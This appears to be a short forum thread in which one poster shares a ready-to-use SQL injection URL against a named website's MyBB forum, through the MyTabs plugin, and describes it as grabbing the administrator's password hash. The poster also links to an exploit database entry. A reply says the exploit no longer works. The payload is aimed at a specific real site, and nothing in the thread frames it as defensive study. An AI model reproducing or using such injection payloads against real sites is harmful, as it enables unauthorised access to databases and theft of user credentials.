NerdChat.net
#1
I haven't actually tested this, because IE blocks me from doing the exploit, but the forum uses MyTabs, which is a MyBB plugin with a huge SQL vulnerability.

Exploit:

http://nerdchat.net/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

(this grabs the administrator's password hash)

A full explanation of the exploit: http://www.exploit-db.com/exploits/17595/
#2
No longer working.

/Closed

